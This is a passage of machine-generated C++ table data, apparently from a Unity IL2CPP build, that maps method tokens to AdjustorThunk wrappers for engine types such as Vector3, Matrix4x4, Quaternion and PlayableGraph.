{ 0x0600036E, RenderTextureDescriptor_set_graphicsFormat_m037DA25F9A8B956D830C7B7E5C6E258DC1133A13_AdjustorThunk },
{ 0x0600036F, RenderTextureDescriptor_get_depthStencilFormat_m360929BE5BD10E9C3D8C936AA6B44B1D11C119CB_AdjustorThunk },
{ 0x06000370, RenderTextureDescriptor_set_depthStencilFormat_m7EC335006743B59AAD1895AD06B2DD74333F9A03_AdjustorThunk },
{ 0x06000371, RenderTextureDescriptor_get_depthBufferBits_mC095E36F9803B2E68E258C03E48ACD0B0E678953_AdjustorThunk },
{ 0x06000372, RenderTextureDescriptor_set_depthBufferBits_mA3710C0D6E485BA6465B328CD8B1954F0E4C5819_AdjustorThunk },
{ 0x06000373, RenderTextureDescriptor_set_dimension_mCE9A4A08454BB2D9DFE3E505EC336FD480078F39_AdjustorThunk },
{ 0x06000374, RenderTextureDescriptor_set_shadowSamplingMode_m4B4CE918DFFF1CC5E3AF981456E186F15FC5DB93_AdjustorThunk },
{ 0x06000375, RenderTextureDescriptor_set_vrUsage_m994CB3D4B250A70BE005D9FDFD24D868E07A52F0_AdjustorThunk },
{ 0x06000376, RenderTextureDescriptor_set_memoryless_m9ECE149930C0E2629A5CD9DA1CD0EA2A01FFE1B2_AdjustorThunk },
{ 0x06000377, RenderTextureDescriptor__ctor_m8B0D32DC550540B5546891C2F6300F384D6FE692_AdjustorThunk },
{ 0x06000378, RenderTextureDescriptor__ctor_m8F8897C63F614AEA4348A95293C911C1293DA3A4_AdjustorThunk },
{ 0x06000379, RenderTextureDescriptor_SetOrClearRenderTextureCreationFlag_m4C08C7A3F715426EBECA2B983361908D097C6424_AdjustorThunk },
{ 0x0600037A, RenderTextureDescriptor_set_createdFromScript_mEE28DED1D3C20DA025A0C44E1C2A531685194F23_AdjustorThunk },
{ 0x0600037B, RenderTextureDescriptor_set_useDynamicScale_m9335866C8754D51235D391E84F8972C4C518844A_AdjustorThunk },
{ 0x0600039D, Color__ctor_m3786F0D6E510D9CFA544523A955870BD2A514C8C_AdjustorThunk },
{ 0x0600039E, Color__ctor_mCD6889CDE39F18704CD6EA8E2EFBFA48BA3E13B0_AdjustorThunk },
{ 0x0600039F, Color_ToString_m0018DE2184B3377CCA6FBD72D5D47886DC669147_AdjustorThunk },
{ 0x060003A0, Color_ToString_mC29251805A0B629C1483DAE7A5BBAAC722B319D2_AdjustorThunk },
{ 0x060003A1, Color_ToString_m70AEF3634C556F6AA01FC3236226C3D27C277229_AdjustorThunk },
{ 0x060003A2, Color_GetHashCode_m2981EEA1DEFE55254945D7D03BE64D4F56BA58D0_AdjustorThunk },
{ 0x060003A3, Color_Equals_m24E409BF329F25774C6577F18EFD3DE1253684D6_AdjustorThunk },
{ 0x060003A4, Color_Equals_mD297CAFFEBE9352C940873862FDF9A28F1F02435_AdjustorThunk },
{ 0x060003AC, Color_RGBMultiplied_m4B3BAE4310EA98451D608E0300331012AFFF1B01_AdjustorThunk },
{ 0x060003B8, Color_get_linear_m76EB88E15DA4E00D615DF33D1CEE51092683117C_AdjustorThunk },
{ 0x060003B9, Color_get_maxColorComponent_m97D2940D48767ACC21D76F8CCEAD6898B722529C_AdjustorThunk },
{ 0x060003BC, Color32__ctor_mC9C6B443F0C7CA3F8B174158B2AF6F05E18EAC4E_AdjustorThunk },
{ 0x060003BF, Color32_ToString_mB1EFBF981F901A76ABF2FEA19EB290A2D8CAFC32_AdjustorThunk },
{ 0x060003C0, Color32_ToString_m263D34787852D176627FC2B910DFE9CABAF26696_AdjustorThunk },
{ 0x060003C9, Matrix4x4_GetLossyScale_m3C19D2C6746BB211C8CB02478A60EB2D71D10FC7_AdjustorThunk },
{ 0x060003CA, Matrix4x4_get_lossyScale_mFB3D4CF6408D710D607CA1D2AF94B2E4E0B57EB7_AdjustorThunk },
{ 0x060003CE, Matrix4x4_get_inverse_m4F4A881CD789281EA90EB68CFD39F36C8A81E6BD_AdjustorThunk },
{ 0x060003D0, Matrix4x4__ctor_m6523044D700F15EC6BCD183633A329EE56AA8C99_AdjustorThunk },
{ 0x060003D1, Matrix4x4_get_Item_mE4D45E661CAD3C54A02156B25F5D10585F250227_AdjustorThunk },
{ 0x060003D2, Matrix4x4_get_Item_m771C2EE3A3BFFBAC9F2AD07FFCAAF6146C1BE92A_AdjustorThunk },
{ 0x060003D3, Matrix4x4_GetHashCode_m313B1AF4FEA792BB7E4D1D239EBE3257F825914D_AdjustorThunk },
{ 0x060003D4, Matrix4x4_Equals_m35CFC5F304BB40EFFE011B92AA87B77CD8FF8F74_AdjustorThunk },
{ 0x060003D5, Matrix4x4_Equals_mDB0C4CCC58BE3E108F1A40BE8DBDCD62E284CC51_AdjustorThunk },
{ 0x060003D8, Matrix4x4_GetColumn_m5CE079D7A69DE70E3144BADD20A1651C73A8D118_AdjustorThunk },
{ 0x060003D9, Matrix4x4_GetRow_m59C6981300C6F6927BEA17C5D095B2AD29629E9F_AdjustorThunk },
{ 0x060003DA, Matrix4x4_MultiplyPoint_m20E910B65693559BFDE99382472D8DD02C862E7E_AdjustorThunk },
{ 0x060003DB, Matrix4x4_MultiplyPoint3x4_mACCBD70AFA82C63DA88555780B7B6B01281AB814_AdjustorThunk },
{ 0x060003DC, Matrix4x4_MultiplyVector_mFD12F86A473E90BBB0002149ABA3917B2A518937_AdjustorThunk },
{ 0x060003E0, Matrix4x4_ToString_mB310BE20B7CDE8AEA91D84FCA4E75BCACF7DFC86_AdjustorThunk },
{ 0x060003E1, Matrix4x4_ToString_m33E7675EAEB7F6E9DA08C49185B92063D967C7A2_AdjustorThunk },
{ 0x060003E2, Matrix4x4_ToString_mB8E1EFF14A37605ABA321708CC36021FFBCF84CF_AdjustorThunk },
{ 0x060003EE, Vector3_get_Item_m163510BFC2F7BFAD1B601DC9F3606B799CF199F2_AdjustorThunk },
{ 0x060003EF, Vector3_set_Item_m79136861DEC5862CE7EC20AB3B0EF10A3957CEC3_AdjustorThunk },
{ 0x060003F0, Vector3__ctor_m376936E6B999EF1ECBE57D990A386303E2283DE0_AdjustorThunk },
{ 0x060003F1, Vector3__ctor_m5F87930F9B0828E5652E2D9D01ED907C01122C86_AdjustorThunk },
{ 0x060003F2, Vector3_Scale_mE0DC2C1B7902271788591F17DBE7F7F72EC37283_AdjustorThunk },
{ 0x060003F4, Vector3_GetHashCode_mB08429DC931A85BD29CE11B9ABC77DE7E0E46327_AdjustorThunk },
{ 0x060003F5, Vector3_Equals_mB4BE43D5986864F5C22B919F2957E0309F10E3B4_AdjustorThunk },
{ 0x060003F6, Vector3_Equals_mEDEAF86793D229455BBF9BA5B30DDF438D6CABC1_AdjustorThunk },
{ 0x060003F9, Vector3_Normalize_mC749B887A4C74BA0A2E13E6377F17CCAEB0AADA8_AdjustorThunk },
{ 0x060003FA, Vector3_get_normalized_m736BBF65D5CDA7A18414370D15B4DFCC1E466F07_AdjustorThunk },
{ 0x06000402, Vector3_get_magnitude_mF0D6017E90B345F1F52D1CC564C640F1A847AF2D_AdjustorThunk },
{ 0x06000404, Vector3_get_sqrMagnitude_m43C27DEC47C4811FB30AB474FF2131A963B66FC8_AdjustorThunk },
{ 0x06000417, Vector3_ToString_m6C24B9F0382D25D75B05C606E127CD14660574EE_AdjustorThunk },
{ 0x06000418, Vector3_ToString_m3185BD544ED9BA81E88936544EC298C19207BDF1_AdjustorThunk },
{ 0x06000419, Vector3_ToString_mA8DA39B6324392BB93203A4D4CB85AF87231CB62_AdjustorThunk },
{ 0x06000424, Quaternion__ctor_m868FD60AA65DD5A8AC0C5DEB0608381A8D85FCD8_AdjustorThunk },
{ 0x0600042E, Quaternion_get_eulerAngles_m2DB5158B5C3A71FD60FC8A6EE43D3AAA1CFED122_AdjustorThunk },
{ 0x06000432, Quaternion_get_normalized_m08AB963B13A0EC6F540A29886C5ACFCCCC0A6D16_AdjustorThunk },
{ 0x06000433, Quaternion_GetHashCode_m5F55C34C98E437376595E722BE4EB8A70434F049_AdjustorThunk },
{ 0x06000434, Quaternion_Equals_mCF93B00BA4FCDDE6100918451343DB9A0583A0A0_AdjustorThunk },
{ 0x06000435, Quaternion_Equals_m25B95D8412B79CC7F8B34062BFAE662BD99578BE_AdjustorThunk },
{ 0x06000436, Quaternion_ToString_mC5BD5DEF60FCA4A38924462A5C4440ECFCF934C4_AdjustorThunk },
{ 0x06000437, Quaternion_ToString_m57FD902CB5D5FDE30866C169033515B5330B3C5F_AdjustorThunk },
{ 0x06000438, Quaternion_ToString_m9B592D577B3FDB892CA53ABF3457BC2EDE45DF8C_AdjustorThunk },
{ 0x0600046C, Vector2_get_Item_m18BC65BB0512B16A1F9C8BE4B83A3E7BBAD7064D_AdjustorThunk },
{ 0x0600046D, Vector2_set_Item_mEF309880B9B3B370B542AABEB32256EEC589DD03_AdjustorThunk },
{ 0x0600046E, Vector2__ctor_m9525B79969AFFE3254B303A40997A56DEEB6F548_AdjustorThunk },
{ 0x06000472, Vector2_Normalize_m56DABCAB5967DF37A6B96710477D3660D800C652_AdjustorThunk },
{ 0x06000473, Vector2_get_normalized_mF6722883AEFB5027690A778DF8ACC20F0FA65297_AdjustorThunk },
{ 0x06000474, Vector2_ToString_mB47B29ECB21FA3A4ACEABEFA18077A5A6BBCCB27_AdjustorThunk },
{ 0x06000475, Vector2_ToString_m5F3C7B1C542DAF4CE90DDAB02A633AB0A3B08A05_AdjustorThunk },
{ 0x06000476, Vector2_ToString_mC10F098442E56919947154402A77EDE28DC9B7BE_AdjustorThunk },
{ 0x06000477, Vector2_GetHashCode_mED8670C0E122B7ED0DAB4C3381ADFF04B75E0B03_AdjustorThunk },
{ 0x06000478, Vector2_Equals_mA4E81D6FCE503DBD502BA499708344410F60DA4E_AdjustorThunk },
{ 0x06000479, Vector2_Equals_mDF84D5ED14E018609C6A9C9BAE016C1B33BCFF4C_AdjustorThunk },
{ 0x0600047B, Vector2_get_magnitude_m5C59B4056420AEFDB291AD0914A3F675330A75CE_AdjustorThunk },
{ 0x0600047C, Vector2_get_sqrMagnitude_mA16336720C14EEF8BA9B55AE33B98C9EE2082BDC_AdjustorThunk },
{ 0x06000495, Vector2Int_get_x_mA2CACB1B6E6B5AD0CCC32B2CD2EDCE3ECEB50576_AdjustorThunk },
{ 0x06000496, Vector2Int_set_x_m291ECF246536852F0B8EE049C4A3768E4999CDC8_AdjustorThunk },
{ 0x06000497, Vector2Int_get_y_m48454163ECF0B463FB5A16A0C4FC4B14DB0768B3_AdjustorThunk },
{ 0x06000498, Vector2Int_set_y_mF81881204EEE272BA409728C7EBFDE3A979DDF6A_AdjustorThunk },
{ 0x06000499, Vector2Int__ctor_mC20D1312133EB8CB63EC11067088B043660F11CE_AdjustorThunk },
{ 0x0600049C, Vector2Int_Equals_m6D91EFAA6B3254334436BD262A4547EA08281BA3_AdjustorThunk },
{ 0x0600049D, Vector2Int_Equals_m32811BA0576C096D5EB5C0CFD8231478F17229A6_AdjustorThunk },
{ 0x0600049E, Vector2Int_GetHashCode_mA3B6135FA770AF0C171319B50D9B913657230EB7_AdjustorThunk },
{ 0x0600049F, Vector2Int_ToString_m6F7E9B9B45A473FED501EB8B8B25BA1FE26DD5D4_AdjustorThunk },
{ 0x060004A0, Vector2Int_ToString_m44BA6941AEF41076A39848B95DDEFEA88A094B5E_AdjustorThunk },
{ 0x060004A2, Vector4_get_Item_mB1D001A235857569E479FB799EF77C52391D19EF_AdjustorThunk },
{ 0x060004A3, Vector4_set_Item_mF24782F861A16BB0436C2262FA916B4EE69998A6_AdjustorThunk },
{ 0x060004A4, Vector4__ctor_m96B2CD8B862B271F513AF0BDC2EABD58E4DBC813_AdjustorThunk },
{ 0x060004A6, Vector4_GetHashCode_m53F6FCA56A0051C9D1AB41AA3EAA2C86CDAA8B92_AdjustorThunk },
{ 0x060004A7, Vector4_Equals_mC2596CA0F441D25DE7A9419BE66A8FA2DA355CB9_AdjustorThunk },
{ 0x060004A8, Vector4_Equals_m73FAA65A1A565EE28D6C9385603829894B7D4392_AdjustorThunk },
{ 0x060004AA, Vector4_get_normalized_mD7671F6DCE4C1A80243139B87858FF65F4B865A3_AdjustorThunk },
{ 0x060004AD, Vector4_get_magnitude_m97A83FC484190F07D8017F4BD10E3C81478E0D20_AdjustorThunk },
{ 0x060004AE, Vector4_get_sqrMagnitude_m864A2908BCF9E060BA73DE3DD259EC06F47F913C_AdjustorThunk },
{ 0x060004B9, Vector4_ToString_mFA0DDF34C1E394F75EF65E06764A1BE750E7F388_AdjustorThunk },
{ 0x060004BA, Vector4_ToString_m2BE67BEBBD3059C9CEE29BF34AD30E1D7057E914_AdjustorThunk },
{ 0x060004DF, PropertyName__ctor_mFA341118B63F88B69464A6F1DF248B569686D778_AdjustorThunk },
{ 0x060004E0, PropertyName__ctor_m9F28B1DA9CEDDEAA6663C795456B9F5E95CAE92F_AdjustorThunk },
{ 0x060004E3, PropertyName_GetHashCode_m7D4B878BA78625CDD78C9B045B5EADFDBF94C378_AdjustorThunk },
{ 0x060004E4, PropertyName_Equals_mFD87005C352B7BEB4279560B1A489409B0692143_AdjustorThunk },
{ 0x060004E5, PropertyName_Equals_m7D00F3B148E65210A82101C31F1F217C9527113E_AdjustorThunk },
{ 0x060004E7, PropertyName_ToString_mDE271855F7B9A516185A66E12D90FE6B6C9DF6C0_AdjustorThunk },
{ 0x0600056C, LayerMask_get_value_m70CBE32210A1F0FD4ECB850285DA90ED57B87974_AdjustorThunk },
{ 0x06000595, RangeInt_get_end_m5835FBEB410CB8AC0928AEFD95728A9AD57F6C63_AdjustorThunk },
{ 0x06000596, RangeInt__ctor_m3CB91E79C7B5AED97E564581025B2F66778B7CBE_AdjustorThunk },
{ 0x060005EC, WorkRequest__ctor_m78DC33ED88BF9BA29E05D2180B2ADC439132F1F5_AdjustorThunk },
{ 0x060005ED, WorkRequest_Invoke_mBFEC6A3799BAFDE7ED840A0523D3D56160C03921_AdjustorThunk },
{ 0x06000631, Pose__ctor_m15CA45808A2BBF1956E836D22C387FAB80BED051_AdjustorThunk },
{ 0x06000632, Pose_ToString_m4F33190911B86A9B72CA59D6AF3C633569CDE6D2_AdjustorThunk },
{ 0x06000633, Pose_ToString_m8C3203B81EB15980F16E07C63B6FBBEECE50A6EF_AdjustorThunk },
{ 0x06000634, Pose_GetTransformedBy_m8B18A1ED205791F95CDC1D1F2A08A42D6DA02CBF_AdjustorThunk },
{ 0x06000635, Pose_GetTransformedBy_mB4C9FECEC5701B761A0E8CB2A8BC76D8E2FFDFCF_AdjustorThunk },
{ 0x06000636, Pose_get_forward_m510527153754B6C2B2CDFDEE25D7168E3C82372A_AdjustorThunk },
{ 0x06000637, Pose_get_right_m8518E7BCEB74B9798BADB001B9E38756CC35ECFE_AdjustorThunk },
{ 0x06000638, Pose_get_up_m5431E350242BEBB0CD7B0AAF9DC9468DC6DDFE5C_AdjustorThunk },
{ 0x0600063A, Pose_Equals_mE6D1524E4DDAAF86BF685A00FE9DCE0908A2A9D6_AdjustorThunk },
{ 0x0600063B, Pose_Equals_m31979E7A46252DBB620F4A0EA3BDBA61782DA498_AdjustorThunk },
{ 0x0600063C, Pose_GetHashCode_mDD6C48FABC18795F04F82D42DFCBC916C0C6CCDB_AdjustorThunk },
{ 0x0600063E, DrivenRectTransformTracker_Add_mC0CE417831BF58E6DA81770CE5E2A99B142EEFEC_AdjustorThunk },
{ 0x0600063F, DrivenRectTransformTracker_Clear_m9A7F5130E4007F70B14AB1FF13A2997C073A64EE_AdjustorThunk },
{ 0x060006E3, DebugScreenCapture_set_rawImageDataReference_mB19FBA997F9FDDE05F33ECDF900F299DEFB7001D_AdjustorThunk },
{ 0x060006E4, DebugScreenCapture_set_imageFormat_m375ECF2BFAC85011D5493B7DE5676B2EC3BA1DFB_AdjustorThunk },
{ 0x060006E5, DebugScreenCapture_set_width_m1200EF0961699A652475F0590BE8D65A583F01A1_AdjustorThunk },
{ 0x060006E6, DebugScreenCapture_set_height_m1798855FA1504E5092D6345264322E4D21B6C2A0_AdjustorThunk },
{ 0x060007A4, MovedFromAttributeData_Set_m155005FB8BCE0569C40B02D75FFADB3FBDB7EEDD_AdjustorThunk },
{ 0x060007A9, Scene_get_handle_mD508BE60333C6168610E12CECAB12E9B11C25E53_AdjustorThunk },
{ 0x060007AA, Scene_get_path_mACD61B36E1F010A9FCA2C62637E0CB24B16729E4_AdjustorThunk },
{ 0x060007AB, Scene_get_buildIndex_m82B6E0C96C85C952B7A2D794DB73CDA99AA9A57E_AdjustorThunk },
{ 0x060007AC, Scene_GetHashCode_m74ACBFB8C656D5620A9A1E62D04E55ACBF63ADC9_AdjustorThunk },
{ 0x060007AD, Scene_Equals_mB973481492F291BF8EAF1AD66B9F7FA3ACF3928D_AdjustorThunk },
{ 0x060007CE, LoadSceneParameters__ctor_m40C160638049BF7577055B3460968F8B73459380_AdjustorThunk },
{ 0x060007CF, PlayerLoopSystem_ToString_m259B8533D2C64C15D381B16F32C710A0018684A0_AdjustorThunk },
{ 0x060007E7, VertexAttributeDescriptor_get_attribute_m2F7C7084857741A39E9FF0D4BABF98F9C7018AAA_AdjustorThunk },
{ 0x060007E8, VertexAttributeDescriptor_set_attribute_m526ED099EEA12DCB2FCB1BC88445FBF921E850A2_AdjustorThunk },
{ 0x060007E9, VertexAttributeDescriptor_get_format_mF8EF98F3E047BC26D177C3A008BCDAF979E52C79_AdjustorThunk },
{ 0x060007EA, VertexAttributeDescriptor_set_format_mCA82263EBD7802621D9ECE42D0F44D4AAECD46C5_AdjustorThunk },
{ 0x060007EB, VertexAttributeDescriptor_get_dimension_mAB440DDFA08BF61D717547EC8B9C43C3DFC56FB8_AdjustorThunk },
{ 0x060007EC, VertexAttributeDescriptor_set_dimension_mEF4325AE27221C732B214354A2DEB044ACFC69EE_AdjustorThunk },
{ 0x060007ED, VertexAttributeDescriptor_get_stream_mAA4D41E2B4B9024161B176700100ADB27855E4FF_AdjustorThunk },
{ 0x060007EE, VertexAttributeDescriptor_set_stream_m9A3991AA0365A1DCEDF80A61990F7B48913A1C0A_AdjustorThunk },
{ 0x060007EF, VertexAttributeDescriptor__ctor_m713B31395FB13FDEB2665F5C4C31572D5875A43A_AdjustorThunk },
{ 0x060007F0, VertexAttributeDescriptor_ToString_m45F7E7D6715E000C617173246F2C9BE23DF3FC8F_AdjustorThunk },
{ 0x060007F1, VertexAttributeDescriptor_GetHashCode_mCB8C5F6AD422FE6A410C5406843FCE4B0ED5F2F8_AdjustorThunk },
{ 0x060007F2, VertexAttributeDescriptor_Equals_m6FBFEE42E1BAAAC2D38434EDF0906C5B76D56BE5_AdjustorThunk },
{ 0x060007F3, VertexAttributeDescriptor_Equals_mF328DE139864C201987238048AC79F8925CA435D_AdjustorThunk },
{ 0x060007F4, RenderTargetIdentifier__ctor_mBB94C5581CCD259EC11AAFA68C151B35E5C72C4F_AdjustorThunk },
{ 0x060007F6, RenderTargetIdentifier_ToString_mA0B5CBC27159C4257939A5CAC6CEACE65AA6D36A_AdjustorThunk },
{ 0x060007F7, RenderTargetIdentifier_GetHashCode_m255E1EFD7BFC22B1B4464F9EF3346386DA328B86_AdjustorThunk },
{ 0x060007F8, RenderTargetIdentifier_Equals_m859988BBC3D58D5C2AEA18C2CCCAF7009A5499D9_AdjustorThunk },
{ 0x060007F9, RenderTargetIdentifier_Equals_m07E36F91E8966A0E3882EF168F1AE3656BE48E9A_AdjustorThunk },
{ 0x06000812, SphericalHarmonicsL2_get_Item_m4B9EF62E01AA7FD8A5DEB222618CDA17A7AE5901_AdjustorThunk },
{ 0x06000813, SphericalHarmonicsL2_GetHashCode_m6683A29826BFE74740D3CF28227E5C6FC8E6955E_AdjustorThunk },
{ 0x06000814, SphericalHarmonicsL2_Equals_m6B04A0E2E26885F766658AA1A2B0BD2499AA82C6_AdjustorThunk },
{ 0x06000815, SphericalHarmonicsL2_Equals_mA22783D26BEE236A8CA5425305D6772CEA6CCBC8_AdjustorThunk },
{ 0x06000817, BatchCullingContext__ctor_m4E95A80E46EB29A21AB9AD64C2D1CC5891281449_AdjustorThunk },
{ 0x0600081B, LODParameters_Equals_mAD45601A9E881620B23A7922D8AA5AFBC91E0B9F_AdjustorThunk },
{ 0x0600081C, LODParameters_Equals_mF956A067D82497A00AC8234322CD848E6FB7BADE_AdjustorThunk },
{ 0x0600081D, LODParameters_GetHashCode_mECFCEAAAC935759A99C30C69BBC99A1148F46F40_AdjustorThunk },
{ 0x06000849, ScriptableRenderContext_GetCameras_Internal_m852016B3544E3ED5FEFB9695EC175622A5B6A8C8_AdjustorThunk },
{ 0x0600084A, ScriptableRenderContext__ctor_m10159F14BB69F555C375E13BB77A1898FDB42FA5_AdjustorThunk },
{ 0x0600084B, ScriptableRenderContext_GetCameras_m9B2329F79132EE49B719560AD739FD3601C44189_AdjustorThunk },
{ 0x0600084C, ScriptableRenderContext_Equals_mBFDA5815F2B6ABA9B16503DA906B8BA42078718D_AdjustorThunk },
{ 0x0600084D, ScriptableRenderContext_Equals_m99E5A233945DFC3B9A786F2413ECE68E5019AB88_AdjustorThunk },
{ 0x0600084E, ScriptableRenderContext_GetHashCode_mA1EE09239F1ACFC29A2ADB027D5E76E690510207_AdjustorThunk },
{ 0x06000851, ShaderTagId__ctor_m4191968F1D2CE19F9092253EC10F83734A9CFF5B_AdjustorThunk },
{ 0x06000852, ShaderTagId_Equals_m02826F7AFC63AA3AE5DB14F7A891F8F173FD9A33_AdjustorThunk },
{ 0x06000853, ShaderTagId_Equals_m932EFCC38C276EEB2784BBC866330F4C595F52E0_AdjustorThunk },
{ 0x06000854, ShaderTagId_GetHashCode_mF5E3A1F96CBDFDCEFABE1B56125EBBA6E3B9EFEF_AdjustorThunk },
{ 0x06000855, StencilState_set_enabled_m6DC861C699D1044E896E833D2DAE69B82F796564_AdjustorThunk },
{ 0x06000856, StencilState_set_readMask_m1BA8F9033413889D4E77DA343DC0029566A9BB9B_AdjustorThunk },
{ 0x06000857, StencilState_set_writeMask_m94471C671E03D42F36DA61436B1068B362375D65_AdjustorThunk },
{ 0x06000858, StencilState_set_compareFunctionFront_m1388C37901DAB6AF9D23C0F01946DCCE19BC9BFC_AdjustorThunk },
{ 0x06000859, StencilState_set_passOperationFront_m1F15CC29366DAEAA6CCE1DB0622C70D6ECC5A3EB_AdjustorThunk },
{ 0x0600085A, StencilState_set_failOperationFront_mADCECAE5D2E75ABAE51650F1F314E661D09C2CD6_AdjustorThunk },
{ 0x0600085B, StencilState_set_zFailOperationFront_mC7D8F0A08B9AEC4203BD6B352CB795E8011EFBB6_AdjustorThunk },
{ 0x0600085C, StencilState_set_compareFunctionBack_m8AF73F4E8FC95A46D33E3192C50702D2AA15D61D_AdjustorThunk },
{ 0x0600085D, StencilState_set_passOperationBack_m4B1395FE21F5B5C809DC6F31D5824A90E05ED220_AdjustorThunk },
{ 0x0600085E, StencilState_set_failOperationBack_mD279271DD1F99EE5B8BC19F5AE60988E6C6F0E4A_AdjustorThunk },
{ 0x0600085F, StencilState_set_zFailOperationBack_mC092ABD8A5EA87245640A10E54C6A1990C4F6864_AdjustorThunk },
{ 0x06000860, StencilState_Equals_m9FFB8A41D8838FD128875CB2D4DAA760C6DF1051_AdjustorThunk },
{ 0x06000861, StencilState_Equals_mEA45A5D2BF2223B15EE0FB8BCEDBA9CB534ADF4B_AdjustorThunk },
{ 0x06000862, StencilState_GetHashCode_mB4A02DEE780377C853D16FFF49CCB9D9F4F711A5_AdjustorThunk },
{ 0x0600087B, FrameData_HasFlags_m268F3C0E03481E2F7217CEB6153C072AB0A68C1C_AdjustorThunk },
{ 0x0600087C, FrameData_get_deltaTime_m522E00CB1B4DA759A5121778A7688DA07735C1F8_AdjustorThunk },
{ 0x0600087D, FrameData_get_effectiveSpeed_m49D7C9FB90C9B640B64D701B026DC26540BC25B9_AdjustorThunk },
{ 0x0600087E, FrameData_get_evaluationType_m0212C6B9A3C3AD09BA24DD4291A9FB528BFD0842_AdjustorThunk },
{ 0x0600087F, FrameData_get_seekOccurred_mC8325617A69EA31B70169D921E258AC60B2750D2_AdjustorThunk },
{ 0x06000880, FrameData_get_timeLooped_m88F002C13ED791E65D9F5705AAD05C19C505918B_AdjustorThunk },
{ 0x06000881, FrameData_get_timeHeld_m1213876DD47660CEA565831282ACA4477BC6644F_AdjustorThunk },
{ 0x06000882, FrameData_get_output_mB5B10130E39676C78F53E6194390B01B87D54FBF_AdjustorThunk },
{ 0x06000883, FrameData_get_effectivePlayState_m58201D8BB3B3489399055AC4D1264007552F2BAB_AdjustorThunk },
{ 0x06000884, FrameRate_get_dropFrame_mC8BFEB9E9E33328497040C4D02EAF1F0DC84AFF4_AdjustorThunk },
{ 0x06000885, FrameRate_get_rate_mF21BC02932E30CCC1832FE1B3C08FE6679F95406_AdjustorThunk },
{ 0x06000886, FrameRate__ctor_m9DF0B1521A85AE2CD542C19C1C253301B389CA71_AdjustorThunk },
{ 0x06000887, FrameRate_IsValid_m8F983C71BC91E1AEF857517C4D344D9FCEAE2851_AdjustorThunk },
{ 0x06000888, FrameRate_Equals_m71B1BAAEDC9E1096965764135FF45A1C464639E6_AdjustorThunk },
{ 0x06000889, FrameRate_Equals_m318AFC57E72479688AFA71ECFCB8F2113BC0044C_AdjustorThunk },
{ 0x0600088B, FrameRate_GetHashCode_mD760D080786680B77E3E8F059950F48EAAF6A819_AdjustorThunk },
{ 0x0600088C, FrameRate_ToString_m899E2A85E7CE55B74522F23706508BD4AF18934F_AdjustorThunk },
{ 0x0600088D, FrameRate_ToString_m72358F5840A02CA9E1B5F326575596E2B094BB56_AdjustorThunk },
{ 0x0600089E, Playable__ctor_mD2EB35E024816AEED68795D0124EAB30E05BF6C4_AdjustorThunk },
{ 0x0600089F, Playable_GetHandle_m39356D23E849DC5428B262092657662C064E04F8_AdjustorThunk },
{ 0x060008A1, Playable_GetPlayableType_mF7103BE376DCD61F54669681AE7BB7D6963D6D43_AdjustorThunk },
{ 0x060008A2, Playable_Equals_mD72D3DB892B8867A0E7BAC032A16C08616EEFF86_AdjustorThunk },
{ 0x060008B6, PlayableBinding_get_sourceObject_m195E6C4C3DF88BD89A2DE3923646B9A013310C09_AdjustorThunk },
{ 0x060008B7, PlayableBinding_CreateOutput_mE29B8B4AE0857C038D6DCA6824A307C60E2DD7C6_AdjustorThunk },
{ 0x060008D2, PlayableGraph_GetRootPlayable_m3BA0011AD6B13FCE5D58EA3E9BB17BE84319B53C_AdjustorThunk },
{ 0x060008D4, PlayableGraph_Evaluate_m5E8756A5AB34EB7F9FC7682932D4BD6BE418352A_AdjustorThunk },
{ 0x060008D5, PlayableGraph_IsValid_mB608FD2CEDAA27C31C34DF4639CF98199ECDC3CA_AdjustorThunk },
{ 0x060008D6, PlayableGraph_IsPlaying_m9289A7D3CBD3A73051568C20F384C1D4FBBA89E0_AdjustorThunk },
{ 0x060008D7, PlayableGraph_Evaluate_m56DAAF530D0A6079FCBCFE86EF5E3E33374A22A7_AdjustorThunk },
{ 0x060008D8, PlayableGraph_GetResolver_m7869599485E96C9D09E0680FA25099E9B2789A47_AdjustorThunk },
{ 0x060008D9, PlayableGraph_GetPlayableCount_m69E1448E840367C9A1D05BE0FB1908BD0C04B809_AdjustorThunk },
{ 0x060008DA, PlayableGraph_GetRootPlayableCount_mAD4CB33AEDB21181CAE1312C3D23CA14E52FFA45_AdjustorThunk },
{ 0x060008DB, PlayableGraph_SynchronizeEvaluation_m9911E65EE4FE46BAE375EF11C884136C840760C0_AdjustorThunk },
{ 0x060008DC, PlayableGraph_CreatePlayableHandle_mF90D606A614FB603DBFFE4E87C325F8CC59BED67_AdjustorThunk },
{ 0x060008DD, PlayableGraph_CreateScriptOutputInternal_m7B8A726419E5A7E5C07436BC168CE28B2D970393_AdjustorThunk },
{ 0x060008DE, PlayableGraph_GetRootPlayableInternal_mB01EE3DE1FED4EB160B5EA367448521ED0F36165_AdjustorThunk },
{ 0x060008DF, PlayableGraph_IsMatchFrameRateEnabled_mC6D005B2F581E49DEA0037C8811CEA771C3CE1C3_AdjustorThunk },
{ 0x060008E0, PlayableGraph_GetFrameRate_m81DF8FC361E09CC2A2FE2350E48FF2B1E4AFA990_AdjustorThunk },
{ 0x060008E1, PlayableGraph_ConnectInternal_m86DBDCCD0D8D5B1734EA7E90268F057A6E52525A_AdjustorThunk },
{ 0x060008F2, PlayableHandle_GetInput_m3F42E2CF0D7DFA2396295133D02622C1BE3A8633_AdjustorThunk },
{ 0x060008F3, PlayableHandle_SetInputWeight_m8647C2593A24870E429A0832FC26EE2241CC302E_AdjustorThunk },
{ 0x060008F4, PlayableHandle_GetInputWeight_m0C5D7A870D6DDE9F1A5193907ADCA0335DC6207A_AdjustorThunk },
{ 0x060008F6, PlayableHandle_Equals_m60AD76B7D38CA989AE84501B2E9F9ED5CB5F9670_AdjustorThunk },
{ 0x060008F7, PlayableHandle_Equals_m81BA0E127133DFF3E45DA61D185FDF48E16BCF45_AdjustorThunk },
{ 0x060008F8, PlayableHandle_GetHashCode_m10FB32ECDC0B9D7BDAEA9E3B76BDDF4614F4EF4F_AdjustorThunk },
{ 0x060008FA, PlayableHandle_CheckInputBounds_m5A5D02E53EF84B63F75DBB414906923677EED1E3_AdjustorThunk },
{ 0x060008FB, PlayableHandle_CheckInputBounds_mEA09337758C333586D6B7B4A5D1E10852ECFC1D8_AdjustorThunk },
{ 0x060008FC, PlayableHandle_IsValid_m07631D12846BAAF2CC302E69A28A44BFE9EB5098_AdjustorThunk },
{ 0x060008FD, PlayableHandle_GetPlayableType_mD9750F1B85DF086F52641D6AB85789601486B686_AdjustorThunk },
{ 0x060008FE, PlayableHandle_SetScriptInstance_m479F7C03A25E77284BE1949CF5EABE903B9B26EE_AdjustorThunk },
